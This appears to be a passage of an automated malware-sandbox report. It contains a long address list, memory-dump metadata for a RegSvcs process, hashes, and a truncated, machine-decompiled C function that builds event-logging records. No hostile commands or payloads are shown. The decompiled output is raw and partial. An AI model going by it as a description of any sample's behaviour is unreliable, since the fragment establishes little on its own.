                                          0x012ffdfa
                                          0x00000000
                                          0x012ffe00
                                          0x012ffe04
                                          0x01355efa
                                          0x01355f00
                                          0x01355f00
                                          0x01355efa
                                          0x012ffe0a
                                          0x012ffa24
                                          0x012ffa2a
                                          0x012ffa2a
                                          0x012ffdfa
                                          0x012ff9cd
                                          0x00000000
                                          0x012ff9cf
                                          0x012ff9cf
                                          0x012ff9d1
                                          0x012ff9d4
                                          0x012ff9d7
                                          0x012ff9d9
                                          0x012ff9dc
                                          0x012ff9df
                                          0x012ff9e2
                                          0x012ff9e7
                                          0x01355f09
                                          0x00000000
                                          0x00000000
                                          0x01355f11
                                          0x012ff9ef
                                          0x012ff9f3
                                          0x012ffed5
                                          0x012ffed8
                                          0x012ffedb
                                          0x01355f1a
                                          0x01355f20
                                          0x01355f20
                                          0x01355f1a
                                          0x012ffee3
                                          0x00000000
                                          0x012ffee9
                                          0x012ffeeb
                                          0x01355f29
                                          0x01355f2f
                                          0x01355f2f
                                          0x01355f29
                                          0x012ffef3
                                          0x00000000
                                          0x012ffef9
                                          0x012ffefc
                                          0x012fff01
                                          0x01355f38
                                          0x01300052
                                          0x01300054
                                          0x00000000
                                          0x01300056
                                          0x01300056
                                          0x012fff40
                                          0x012fff42
                                          0x01355f6e
                                          0x01355f74
                                          0x01355f74
                                          0x01355f6e
                                          0x012fff50
                                          0x012fff56
                                          0x012fff5b
                                          0x01355f7d
                                          0x00000000
                                          0x00000000
                                          0x01355f83
                                          0x00000000
                                          0x012fff61
                                          0x012fff61
                                          0x012fff63
                                          0x01300021
                                          0x01300026
                                          0x0130002b
                                          0x0130007e
                                          0x01300080
                                          0x01300080
                                          0x0130007e
                                          0x0130002f
                                          0x00000000
                                          0x01300031
                                          0x01300033
                                          0x01300086
                                          0x01300035
                                          0x01300035
                                          0x01300035
                                          0x0130003c
                                          0x00000000
                                          0x0130003c
                                          0x0130002f
                                          0x012fff69
                                          0x012fff6b
                                          0x01355f8c
                                          0x01355f92
                                          0x01355f92
                                          0x01355f8c
                                          0x012fff74
                                          0x012fff77
                                          0x012fff7b
                                          0x01355f99
                                          0x01355f9b
                                          0x012fff81
                                          0x012fff81
                                          0x012fff83
                                          0x012fff83
                                          0x012fff88
                                          0x012fff8b
                                          0x012fff90
                                          0x012fff92
                                          0x012fff92
                                          0x012fff9c
                                          0x012fffa2
                                          0x012fffa6
                                          0x012fffaa
                                          0x012fffad
                                          0x012fffb2
                                          0x01355fa4
                                          0x01355faa
                                          0x01355faa
                                          0x01355fa4
                                          0x012fffb8
                                          0x00000000
                                          0x012fffb8
                                          0x012fff5b
                                          0x01300054
                                          0x01355f3e
                                          0x01355f3e
                                          0x012fff09
                                          0x00000000
                                          0x00000000
                                          0x012fff0f
                                          0x012fff14
                                          0x01355f47
                                          0x01355f4d
                                          0x01355f4d
                                          0x01355f47
                                          0x012fff1c
                                          0x01300046
                                          0x01300076
                                          0x01300078
                                          0x00000000
                                          0x01300048
                                          0x01300048
                                          0x0130004a
                                          0x0130004a
                                          0x00000000
                                          0x0130004a
                                          0x012fff22
                                          0x012fff22
                                          0x012fff26
                                          0x01355f56
                                          0x01355f5c
                                          0x01355f5c
                                          0x01355f56
                                          0x012fff2e
                                          0x00000000
                                          0x012fff34
                                          0x012fff36
                                          0x01355f65
                                          0x012fff3c
                                          0x012fff3c
                                          0x012fff3c
                                          0x012fff3e
                                          0x00000000
                                          0x012fff3e
                                          0x012fff2e
                                          0x012fff1c
                                          0x012ffef3
                                          0x012ffee3
                                          0x012ff9f9
                                          0x012ff9f9
                                          0x012ff9fb
                                          0x012ff9ff
                                          0x012ffbd5
                                          0x01355fb1
                                          0x01355fb1
                                          0x012ffbdf
                                          0x00000000
                                          0x012ffbe5
                                          0x012ffbe5
                                          0x012ffbe8
                                          0x012ffbed
                                          0x01355fdf
                                          0x012ffc01
                                          0x012ffc01
                                          0x012ffc04
                                          0x012ffc09
                                          0x01355fee
                                          0x01355ff4
                                          0x01355ff4
                                          0x01355fee
                                          0x012ffc0f
                                          0x012ffc13
                                          0x012ffc1d
                                          0x012ffc20
                                          0x012ffc23
                                          0x012ffc26
                                          0x012ffc2b
                                          0x01355ffd
                                          0x01356003
                                          0x01356003
                                          0x01355ffd
                                          0x012ffc33
                                          0x00000000
                                          0x012ffc39
                                          0x012ffc3b
                                          0x012ffc3e
                                          0x012ffc41
                                          0x012ffc46
                                          0x0135600c
                                          0x01356012
                                          0x01356012
                                          0x0135600c
                                          0x012ffc4e
                                          0x00000000
                                          0x012ffc54
                                          0x012ffc54
                                          0x012ffc59
                                          0x0135601b
                                          0x01356021
                                          0x01356021
                                          0x0135601b
                                          0x012ffc61
                                          0x00000000
                                          0x012ffc67
                                          0x012ffc6a
                                          0x012ffc6f
                                          0x0135602a
                                          0x01356030
                                          0x01356030
                                          0x0135602a
                                          0x012ffc77
                                          0x00000000
                                          0x012ffc7d
                                          0x012ffc7f
                                          0x012ffc81
                                          0x012ffc85
                                          0x012ffc87
                                          0x012ffc87
                                          0x012ffc8c
                                          0x012ffc8f
                                          0x012ffc94
                                          0x01356039
                                          0x012ffc9c
                                          0x012ffca4
                                          0x012ffcaa
                                          0x012ffcaf
                                          0x01356046
                                          0x012ffcbd
                                          0x012ffcbf
                                          0x0135606d
                                          0x01356073
                                          0x01356073
                                          0x0135606d
                                          0x012ffcc8
                                          0x012ffccd
                                          0x012ffccf
                                          0x012ffcd3
                                          0x012ffcd5
                                          0x012ffcd5
                                          0x012ffcde
                                          0x012ffce1
                                          0x012ffce3
                                          0x012ffce3
                                          0x012ffce8
                                          0x012ffcf0
                                          0x012ffcf2
                                          0x012ffcf5
                                          0x012ffcf7
                                          0x012ffcff
                                          0x012ffd02
                                          0x012ffd06
                                          0x012ffd11
                                          0x012ffd14
                                          0x012ffd17
                                          0x0135607c
                                          0x01356082
                                          0x01356082
                                          0x0135607c
                                          0x012ffd1f
                                          0x00000000
                                          0x012ffd25
                                          0x012ffd28
                                          0x012ffd2d
                                          0x0135608b
                                          0x01356091
                                          0x01356091
                                          0x0135608b
                                          0x012ffd35
                                          0x00000000
                                          0x012ffd3b
                                          0x012ffd3e
                                          0x012ffd43
                                          0x0135609a
                                          0x01300016
                                          0x01300018
                                          0x00000000
                                          0x0130001a
                                          0x0130001a
                                          0x012ffd82
                                          0x012ffd84
                                          0x013560d9
                                          0x013560df
                                          0x013560df
                                          0x013560d9
                                          0x012ffd8d
                                          0x012ffd95
                                          0x012ffd98
                                          0x012ffd9d
                                          0x013560e8
                                          0x00000000
                                          0x00000000
                                          0x013560ee
                                          0x00000000
                                          0x012ffda3
                                          0x012ffda3
                                          0x012ffda5
                                          0x012ffe8b
                                          0x012ffe90
                                          0x012ffe95
                                          0x013560f7
                                          0x013560fd
                                          0x013560fd
                                          0x013560f7
                                          0x012ffe9d
                                          0x00000000
                                          0x012ffea3
                                          0x012ffea5
                                          0x01356106
                                          0x012ffeab
                                          0x012ffeab
                                          0x012ffeab
                                          0x012ffeb2
                                          0x012ffeb5
                                          0x00000000
                                          0x012ffeb5
                                          0x012ffe9d
                                          0x012ffdab
                                          0x012ffdad
                                          0x0135610f
                                          0x01356115
                                          0x01356115
                                          0x0135610f
                                          0x012ffdb6
                                          0x012ffdbb
                                          0x0135611e
                                          0x01356120
                                          0x012ffdc1
                                          0x012ffdc1
                                          0x012ffdc5
                                          0x012ffdc5
                                          0x012ffdc7
                                          0x012ffdcc
                                          0x012ffdce
                                          0x012ffdce
                                          0x012ffdd6
                                          0x012ffdd8
                                          0x00000000
                                          0x012ffdd8
                                          0x012ffd9d
                                          0x01300018
                                          0x013560a0
                                          0x013560a0
                                          0x012ffd4b
                                          0x00000000
                                          0x00000000
                                          0x012ffd51
                                          0x012ffd56
                                          0x013560a9
                                          0x013560af
                                          0x013560af
                                          0x013560a9
                                          0x012ffd5e
                                          0x012ffebf
                                          0x013560b8
                                          0x012ffec5
                                          0x012ffec5
                                          0x012ffec5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction ID: d110fa7a12dc739ffbd83ab0ef6dd714057b85e42fd911d45fb4ba5f738fdd9b
                                          • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction Fuzzy Hash: 3962F733E247668BDB27CE1CC64176AFBB06F45A58F1982BCCE559B382D371D8418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E013C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t296;
                                          				signed char _t298;
                                          				signed int _t301;
                                          				signed int _t306;
                                          				signed int _t310;
                                          				signed char _t311;
                                          				intOrPtr _t312;
                                          				signed int _t313;
                                          				void* _t327;
                                          				signed int _t328;
                                          				intOrPtr _t329;
                                          				intOrPtr _t333;
                                          				signed char _t334;
                                          				signed int _t336;
                                          				void* _t339;
                                          				signed int _t340;
                                          				signed int _t356;
                                          				signed int _t362;
                                          				short _t367;
                                          				short _t368;
                                          				short _t373;
                                          				signed int _t380;
                                          				void* _t382;
                                          				short _t385;
                                          				signed short _t392;
                                          				signed char _t393;
                                          				signed int _t395;
                                          				signed char _t397;
                                          				signed int _t398;
                                          				signed short _t402;
                                          				void* _t406;
                                          				signed int _t412;
                                          				signed char _t414;
                                          				signed short _t416;
                                          				signed int _t421;
                                          				signed char _t427;
                                          				intOrPtr _t434;
                                          				signed char _t435;
                                          				signed int _t436;
                                          				signed int _t442;
                                          				signed int _t446;
                                          				signed int _t447;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t456;
                                          				intOrPtr* _t457;
                                          				short _t458;
                                          				signed short _t462;
                                          				signed int _t469;
                                          				intOrPtr* _t474;
                                          				signed int _t475;
                                          				signed int _t479;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				short _t485;
                                          				signed int _t491;
                                          				signed int* _t494;
                                          				signed int _t498;
                                          				signed int _t505;
                                          				intOrPtr _t506;
                                          				signed short _t508;
                                          				signed int _t511;
                                          				void* _t517;
                                          				signed int _t519;
                                          				signed int _t522;
                                          				void* _t523;
                                          				signed int _t524;
                                          				void* _t528;
                                          				signed int _t529;
                                          
                                          				_push(0xd4);
                                          				_push(0x13d1178);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				_t494 = __edx;
                                          				 *(_t528 - 0xcc) = __edx;
                                          				_t511 = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                          				 *(_t528 - 0xbc) = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                          				_t427 = 0;
                                          				 *(_t528 - 0x74) = 0;
                                          				 *(_t528 - 0x9c) = 0;
                                          				 *(_t528 - 0x84) = 0;
                                          				 *(_t528 - 0xac) = 0;
                                          				 *(_t528 - 0x88) = 0;
                                          				 *(_t528 - 0xa8) = 0;
                                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                          				if( *(_t528 + 0x1c) <= 0x80) {
                                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                          					if(__eflags != 0) {
                                          						_t421 = E013C4C56(0, __edx, __ecx, __eflags);
                                          						__eflags = _t421;
                                          						if(_t421 != 0) {
                                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                                          							E0133D000(0x410);
                                          							 *(_t528 - 0x18) = _t529;
                                          							 *(_t528 - 0x9c) = _t529;
                                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                          							E013C5542(_t528 - 0x9c, _t528 - 0x84);
                                          						}
                                          					}
                                          					_t435 = _t427;
                                          					 *(_t528 - 0xd0) = _t435;
                                          					_t474 = _t511 + 0x65;
                                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          					_t511 = 0x18;
                                          					while(1) {
                                          						 *(_t528 - 0xa0) = _t427;
                                          						 *(_t528 - 0xbc) = _t427;
                                          						 *(_t528 - 0x80) = _t427;
                                          						 *(_t528 - 0x78) = 0x50;
                                          						 *(_t528 - 0x79) = _t427;
                                          						 *(_t528 - 0x7a) = _t427;
                                          						 *(_t528 - 0x8c) = _t427;
                                          						 *(_t528 - 0x98) = _t427;
                                          						 *(_t528 - 0x90) = _t427;
                                          						 *(_t528 - 0xb0) = _t427;
                                          						 *(_t528 - 0xb8) = _t427;
                                          						_t296 = 1 << _t435;
                                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                          						__eflags = _t436 & _t296;
                                          						if((_t436 & _t296) != 0) {
                                          							goto L92;
                                          						}
                                          						__eflags =  *((char*)(_t474 - 1));
                                          						if( *((char*)(_t474 - 1)) == 0) {
                                          							goto L92;
                                          						}
                                          						_t301 =  *_t474;
                                          						__eflags = _t494[1] - _t301;
                                          						if(_t494[1] <= _t301) {
                                          							L10:
                                          							__eflags =  *(_t474 - 5) & 0x00000040;
                                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                          								L12:
                                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                          									goto L92;
                                          								}
                                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                          									goto L92;
                                          								}
                                          								__eflags = _t442 -  *(_t474 - 0x11);
                                          								if(_t442 !=  *(_t474 - 0x11)) {
                                          									goto L92;
                                          								}
                                          								L15:
                                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                                          								 *(_t528 - 0xc0) = _t306;
                                          								 *(_t528 - 0xa4) = _t306;
                                          								__eflags =  *0x13e60e8;
                                          								if( *0x13e60e8 != 0) {
                                          									__eflags = _t306 - 0x40;
                                          									if(_t306 < 0x40) {
                                          										L20:
                                          										asm("lock inc dword [eax]");
                                          										_t310 =  *0x13e60e8; // 0x0
                                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                          										__eflags = _t311 & 0x00000001;
                                          										if((_t311 & 0x00000001) == 0) {
                                          											 *(_t528 - 0xa0) = _t311;
                                          											_t475 = _t427;
                                          											 *(_t528 - 0x74) = _t427;
                                          											__eflags = _t475;
                                          											if(_t475 != 0) {
                                          												L91:
                                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          												goto L92;
                                          											}
                                          											asm("sbb edi, edi");
                                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                          											_t511 = _t498;
                                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                          											__eflags =  *(_t312 - 5) & 1;
                                          											if(( *(_t312 - 5) & 1) != 0) {
                                          												_push(_t528 - 0x98);
                                          												_push(0x4c);
                                          												_push(_t528 - 0x70);
                                          												_push(1);
                                          												_push(0xfffffffa);
                                          												_t412 = E01339710();
                                          												_t475 = _t427;
                                          												__eflags = _t412;
                                          												if(_t412 >= 0) {
                                          													_t414 =  *(_t528 - 0x98) - 8;
                                          													 *(_t528 - 0x98) = _t414;
                                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                          													 *(_t528 - 0x8c) = _t416;
                                          													 *(_t528 - 0x79) = 1;
                                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                          											__eflags = _t446 & 0x00000004;
                                          											if((_t446 & 0x00000004) != 0) {
                                          												__eflags =  *(_t528 - 0x9c);
                                          												if( *(_t528 - 0x9c) != 0) {
                                          													 *(_t528 - 0x7a) = 1;
                                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t313 = 2;
                                          											_t447 = _t446 & _t313;
                                          											__eflags = _t447;
                                          											 *(_t528 - 0xd4) = _t447;
                                          											if(_t447 != 0) {
                                          												_t406 = 0x10;
                                          												_t511 = _t511 + _t406;
                                          												__eflags = _t511;
                                          											}
                                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                          											 *(_t528 - 0x88) = _t427;
                                          											__eflags =  *(_t528 + 0x1c);
                                          											if( *(_t528 + 0x1c) <= 0) {
                                          												L45:
                                          												__eflags =  *(_t528 - 0xb0);
                                          												if( *(_t528 - 0xb0) != 0) {
                                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          													__eflags = _t511;
                                          												}
                                          												__eflags = _t475;
                                          												if(_t475 != 0) {
                                          													asm("lock dec dword [ecx+edx*8+0x4]");
                                          													goto L100;
                                          												} else {
                                          													_t494[3] = _t511;
                                          													_t451 =  *(_t528 - 0xa0);
                                          													_t427 = E01336DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                          													 *(_t528 - 0x88) = _t427;
                                          													__eflags = _t427;
                                          													if(_t427 == 0) {
                                          														__eflags = _t511 - 0xfff8;
                                          														if(_t511 <= 0xfff8) {
                                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                          															asm("sbb ecx, ecx");
                                          															__eflags = (_t451 & 0x000000e2) + 8;
                                          														}
                                          														asm("lock dec dword [eax+edx*8+0x4]");
                                          														L100:
                                          														goto L101;
                                          													}
                                          													_t453 =  *(_t528 - 0xa0);
                                          													 *_t494 = _t453;
                                          													_t494[1] = _t427;
                                          													_t494[2] =  *(_t528 - 0xbc);
                                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x14);
                                          													if( *(_t528 + 0x14) == 0) {
                                          														__eflags =  *[fs:0x18] + 0xf50;
                                          													}
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x18);
                                          													if( *(_t528 + 0x18) == 0) {
                                          														_t454 =  *(_t528 - 0x80);
                                          														_t479 =  *(_t528 - 0x78);
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													} else {
                                          														_t146 = _t427 + 0x50; // 0x50
                                          														_t454 = _t146;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t382 = 0x18;
                                          														 *_t454 = _t382;
                                          														 *((short*)(_t454 + 2)) = 1;
                                          														_t385 = 0x10;
                                          														 *((short*)(_t454 + 6)) = _t385;
                                          														 *(_t454 + 4) = 0;
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = 0x68;
                                          														 *(_t528 - 0x78) = _t479;
                                          													}
                                          													__eflags =  *(_t528 - 0x79) - _t327;
                                          													if( *(_t528 - 0x79) == _t327) {
                                          														_t524 = _t479 + _t427;
                                          														_t508 =  *(_t528 - 0x8c);
                                          														 *_t524 = _t508;
                                          														_t373 = 2;
                                          														 *((short*)(_t524 + 2)) = _t373;
                                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                          														 *((short*)(_t524 + 4)) = 0;
                                          														_t167 = _t524 + 8; // 0x8
                                          														E0133F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t380 =  *(_t528 - 0x80);
                                          														__eflags = _t380;
                                          														if(_t380 != 0) {
                                          															_t173 = _t380 + 4;
                                          															 *_t173 =  *(_t380 + 4) | 1;
                                          															__eflags =  *_t173;
                                          														}
                                          														_t454 = _t524;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													}
                                          													__eflags =  *(_t528 - 0xd4);
                                          													if( *(_t528 - 0xd4) == 0) {
                                          														_t505 =  *(_t528 - 0x80);
                                          													} else {
                                          														_t505 = _t479 + _t427;
                                          														_t523 = 0x10;
                                          														 *_t505 = _t523;
                                          														_t367 = 3;
                                          														 *((short*)(_t505 + 2)) = _t367;
                                          														_t368 = 4;
                                          														 *((short*)(_t505 + 6)) = _t368;
                                          														 *(_t505 + 4) = 0;
                                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = _t479 + _t523;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t454;
                                          														if(_t454 != 0) {
                                          															_t186 = _t454 + 4;
                                          															 *_t186 =  *(_t454 + 4) | 1;
                                          															__eflags =  *_t186;
                                          														}
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0x7a) - _t327;
                                          													if( *(_t528 - 0x7a) == _t327) {
                                          														 *(_t528 - 0xd4) = _t479 + _t427;
                                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                          														E0133F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + _t522;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t199 = _t505 + 4;
                                          															 *_t199 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t199;
                                          														}
                                          														_t505 =  *(_t528 - 0xd4);
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0xa8);
                                          													if( *(_t528 - 0xa8) != 0) {
                                          														_t356 = _t479 + _t427;
                                          														 *(_t528 - 0xd4) = _t356;
                                          														_t462 =  *(_t528 - 0xac);
                                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                          														_t485 = 0xc;
                                          														 *((short*)(_t356 + 2)) = _t485;
                                          														 *(_t356 + 6) = _t462;
                                          														 *((short*)(_t356 + 4)) = 0;
                                          														_t211 = _t356 + 8; // 0x9
                                          														E0133F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                          														E0133FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0x18;
                                          														_t427 =  *(_t528 - 0x88);
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t505 =  *(_t528 - 0xd4);
                                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t362 =  *(_t528 - 0x80);
                                          														__eflags = _t362;
                                          														if(_t362 != 0) {
                                          															_t222 = _t362 + 4;
                                          															 *_t222 =  *(_t362 + 4) | 1;
                                          															__eflags =  *_t222;
                                          														}
                                          													}
                                          													__eflags =  *(_t528 - 0xb0);
                                          													if( *(_t528 - 0xb0) != 0) {
                                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                          														_t458 = 0xb;
                                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                          														E0133FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t241 = _t505 + 4;
                                          															 *_t241 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t241;
                                          														}
                                          													}
                                          													_t328 =  *(_t528 + 0x1c);
                                          													__eflags = _t328;
                                          													if(_t328 == 0) {
                                          														L87:
                                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                          														_t455 =  *(_t528 - 0xdc);
                                          														 *(_t427 + 0x14) = _t455;
                                          														_t480 =  *(_t528 - 0xa0);
                                          														_t517 = 3;
                                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                          															asm("rdtsc");
                                          															 *(_t427 + 0x3c) = _t480;
                                          														} else {
                                          															 *(_t427 + 0x3c) = _t455;
                                          														}
                                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                          														_t456 =  *[fs:0x18];
                                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                          														_t427 = 0;
                                          														__eflags = 0;
                                          														_t511 = 0x18;
                                          														goto L91;
                                          													} else {
                                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                          														__eflags = _t519;
                                          														 *(_t528 - 0x8c) = _t328;
                                          														do {
                                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                          																_t334 =  *_t519;
                                          															} else {
                                          																_t334 = 0;
                                          															}
                                          															_t336 = _t334 & 0x000000ff;
                                          															__eflags = _t336;
                                          															_t427 =  *(_t528 - 0x88);
                                          															if(_t336 == 0) {
                                          																_t481 = _t479 + _t506;
                                          																__eflags = _t481;
                                          																 *(_t528 - 0x78) = _t481;
                                          																E0133F3E0(_t479 + _t427, _t457, _t506);
                                          																_t529 = _t529 + 0xc;
                                          															} else {
                                          																_t340 = _t336 - 1;
                                          																__eflags = _t340;
                                          																if(_t340 == 0) {
                                          																	E0133F3E0( *(_t528 - 0xb8), _t457, _t506);
                                          																	_t529 = _t529 + 0xc;
                                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                          																} else {
                                          																	__eflags = _t340 == 0;
                                          																	if(_t340 == 0) {
                                          																		__eflags = _t506 - 8;
                                          																		if(_t506 == 8) {
                                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															_t339 = 0x10;
                                          															_t519 = _t519 + _t339;
                                          															_t263 = _t528 - 0x8c;
                                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                                          															__eflags =  *_t263;
                                          															_t479 =  *(_t528 - 0x78);
                                          														} while ( *_t263 != 0);
                                          														goto L87;
                                          													}
                                          												}
                                          											} else {
                                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                          												 *(_t528 - 0xa2) = _t392;
                                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                          												__eflags = _t469;
                                          												while(1) {
                                          													 *(_t528 - 0xe4) = _t511;
                                          													__eflags = _t392;
                                          													_t393 = _t427;
                                          													if(_t392 != 0) {
                                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                                          													}
                                          													_t395 = (_t393 & 0x000000ff) - _t427;
                                          													__eflags = _t395;
                                          													if(_t395 == 0) {
                                          														_t511 = _t511 +  *_t469;
                                          														__eflags = _t511;
                                          													} else {
                                          														_t398 = _t395 - 1;
                                          														__eflags = _t398;
                                          														if(_t398 == 0) {
                                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
